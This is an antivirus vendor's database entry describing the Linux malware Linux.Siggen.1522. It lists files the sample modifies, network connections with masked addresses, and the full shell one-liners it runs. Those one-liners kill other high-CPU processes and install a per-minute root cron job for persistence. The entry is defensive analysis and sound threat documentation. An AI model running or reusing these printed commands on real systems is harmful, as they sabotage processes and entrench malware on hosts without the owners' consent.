Linux.Siggen.1522
Added to the Dr.Web virus database:
2019-03-20
Virus description added:
2019-03-20
Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /var/spool/cron/crontabs/root
Malicious functions:
Launches itself as a daemon
Launches processes:
- sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- 'python[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- 'python[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi
- id -u
- ps aux
- grep -v grep
- grep -v -- python[[:space:]]*$
- grep -v /usr/sbin/httpd
- awk {if($3>30.0) print $2}
- sh -c dir=`pwd 2>/dev/null`;rm -rf $dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '<SAMPLE_FULL_PATH>' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '$dir/'<SAMPLE_FULL_PATH>' >> .cron 2>/dev/null; if [ $(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '<SAMPLE_FULL_PATH>$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab $dir/.cron 2>/dev/null; fi;rm -rf $dir/.cron 2>/dev/null
- rm -rf /root/.cron
- crontab -l
- grep -v <SAMPLE_FULL_PATH>
- grep <SAMPLE_FULL_PATH>$
- sort
- wc -l
- uniq
- crontab /root/.cron
- sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'python[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'python[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'python[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'python[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi fi
- grep -- python[[:space:]]*$
Performs operations with the file system:
Modifies file access rights:
- /var/spool/cron/crontabs/tmp.uaohxZ
Creates or modifies files:
- /root/.cron
- /var/spool/cron/.cron
- /var/spool/cron/crontabs/tmp.uaohxZ
- /tmp/.lock
Deletes files:
Locks files:
Network activity:
Establishes connection:
- 10#.##1.99.95:65535
- 10#.###.99.221:65535
- [2#######:2:141e::47d9]:65535
- 10#.##1.99.95:80
DNS ASK:
Sends data to the following servers:
Receives data from the following servers:
Other:
Collects CPU information
Collects RAM information
Collects information about network activity
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
このウェブサイトを継続して訪問する場合、訪問者に関する統計データを収集するためのCookieファイルおよび他のテクノロジーを弊社が利用することに同意したものとします。詳細